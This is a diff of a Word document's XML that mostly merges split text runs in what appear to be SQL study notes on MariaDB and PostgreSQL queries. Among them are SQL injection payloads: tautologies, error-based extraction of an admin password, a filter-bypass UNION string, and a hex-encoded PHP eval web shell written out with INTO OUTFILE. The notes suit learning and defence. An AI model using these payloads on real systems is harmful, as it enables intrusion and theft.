-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11731,15 +10899,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where 0;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where 0;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11749,15 +10909,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11779,15 +10931,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where 1;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where 1;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11797,15 +10941,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11836,15 +10972,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student where id='2015141462109' or '1'='1';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109' or '1'='1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11854,15 +10982,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11888,15 +11008,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id='2015141462109''1';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11906,15 +11018,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11935,15 +11039,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id='2015141462109''1'='1';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1'='1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11953,15 +11049,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11983,15 +11071,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id='2015141462109''or'='or';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''or'='or';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12001,15 +11081,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12035,15 +11107,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id='2015141462109''1'='1';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1'='1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12053,15 +11117,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12103,15 +11159,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12145,15 +11193,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12236,15 +11276,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12289,15 +11321,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id='2015141462109' and grade='2015'=0;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109' and grade='2015'=0;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12307,15 +11331,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12337,15 +11353,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student  where id=1=0;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id=1=0;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12355,15 +11363,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12406,15 +11406,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>select * from ip where ip not like "121.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>48.%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>";</w:t>
+        <w:t>select * from ip where ip not like "121.48.%";</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12439,15 +11431,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12571,15 +11555,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select 'hello' from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>jwc.student</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>;</w:t>
+        <w:t>select 'hello' from jwc.student;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12617,15 +11593,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>select  0</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e;</w:t>
+        <w:t>MariaDB [(none)]&gt; select  0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12645,15 +11613,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>| &lt;?php eval($_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>POST[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ximo]); ?&gt;                               |</w:t>
+        <w:t>| &lt;?php eval($_POST[ximo]); ?&gt;                               |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12668,15 +11628,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>select  3</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2 into outfile '/root/Desktop/a.php';</w:t>
+        <w:t>MariaDB [(none)]&gt; select  3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2 into outfile '/root/Desktop/a.php';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12785,15 +11737,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from jwc.teacher where '1'='1' order by 1;</w:t>
+        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by 1;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12804,15 +11748,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12832,15 +11768,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from jwc.teacher where '1'='1' order by 1 and '1'='2';</w:t>
+        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by 1 and '1'='2';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12850,15 +11778,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12899,15 +11819,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from jwc.teacher where '1'='1' order by '5'-'1';</w:t>
+        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by '5'-'1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12917,15 +11829,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12988,15 +11892,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>123  |</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> NULL |</w:t>
+        <w:t>| 123  | NULL |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13141,15 +12037,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>MID(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ColumnName, Start [, Length]) FROM TableName</w:t>
+        <w:t>SELECT MID(ColumnName, Start [, Length]) FROM TableName</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13205,26 +12093,13 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>concat(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CONCAT(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'FIRST ', 'SECOND');</w:t>
+      <w:r>
+        <w:t>concat()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SELECT CONCAT('FIRST ', 'SECOND');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13234,15 +12109,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CONCAT(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'FIRST ', 'SECOND') |</w:t>
+        <w:t>| CONCAT('FIRST ', 'SECOND') |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13375,15 +12242,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>extractvalue(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">1, concat(0x5c, (select table_name from information_schema.tables limit 1))); </w:t>
+        <w:t xml:space="preserve">and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13403,42 +12262,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>and select 1 from (select count(*</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>),concat</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">and (select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select * from article where id = 1 and (select 1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>from  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);</w:t>
+        <w:t>and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13451,15 +12286,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select * from article where id = 1 and (select 1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>from  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
+        <w:t>select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13473,15 +12300,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>UnIoN/*&amp;a=*/SeLeCT/*&amp;a=*/1,2,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3,database</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>()-- -</w:t>
+        <w:t>UnIoN/*&amp;a=*/SeLeCT/*&amp;a=*/1,2,3,database()-- -</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14616,28 +13435,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| name     | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>3) | YES  |     | NULL    |       |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| birthday | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>int(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>2)     | YES  |     | NULL    |       |</w:t>
+        <w:t>| name     | varchar(3) | YES  |     | NULL    |       |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| birthday | int(2)     | YES  |     | NULL    |       |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14730,15 +13533,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">create table </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>cmd blob)</w:t>
+        <w:t>create table a(cmd blob)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14908,15 +13703,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| root </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:1                |</w:t>
+        <w:t>| root | ::1                |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15251,15 +14038,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">having </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">*) &lt; 2  </w:t>
+        <w:t xml:space="preserve">having count(*) &lt; 2  </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -15289,28 +14068,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">postgres=# SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>*,COUNT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(1)  over() from course;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>cno  |</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">   cname    | ccredit | cdept | count</w:t>
+        <w:t>postgres=# SELECT *,COUNT(1)  over() from course;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  cno  |   cname    | ccredit | cdept | count</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15435,15 +14198,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">SELECT name, test, score, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>AVG(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">score) OVER (PARTITION BY test) </w:t>
+        <w:t xml:space="preserve">SELECT name, test, score, AVG(score) OVER (PARTITION BY test) </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15516,15 +14271,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">postgres=# select min(score) </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>over(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>partition by test) from test;</w:t>
+        <w:t>postgres=# select min(score) over(partition by test) from test;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15629,28 +14376,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">postgres=# SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>*,COUNT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(1)  from course group by cno;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>cno  |</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">   cname    | ccredit | cdept | count</w:t>
+        <w:t>postgres=# SELECT *,COUNT(1)  from course group by cno;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  cno  |   cname    | ccredit | cdept | count</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15798,15 +14529,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">(select Cno from sc where </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>sc.Sno</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=Student.sno)</w:t>
+        <w:t>(select Cno from sc where sc.Sno=Student.sno)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15958,26 +14681,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>∏</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>JNO,PNO</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(SPJ) ÷ ∏PNO(σSNO='S1'(SPJ))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select distinct JNO from SPJ TMP where not </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>exists(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>∏JNO,PNO(SPJ) ÷ ∏PNO(σSNO='S1'(SPJ))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select distinct JNO from SPJ TMP where not exists(</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -16185,15 +14895,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( select</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sno</w:t>
+        <w:t xml:space="preserve">  ( select sno</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16250,373 +14952,309 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>select sno,sname from student where not exists(select * from sc where sc.cno='1' and sc.sno=student.sno);</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>查询选了</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>号课程和</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>号课程的学生的姓名。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">select sname      </w:t>
+      </w:r>
+      <w:r>
+        <w:t>选了二号课程的人以及</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>号课程的人</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  from student</w:t>
+      </w:r>
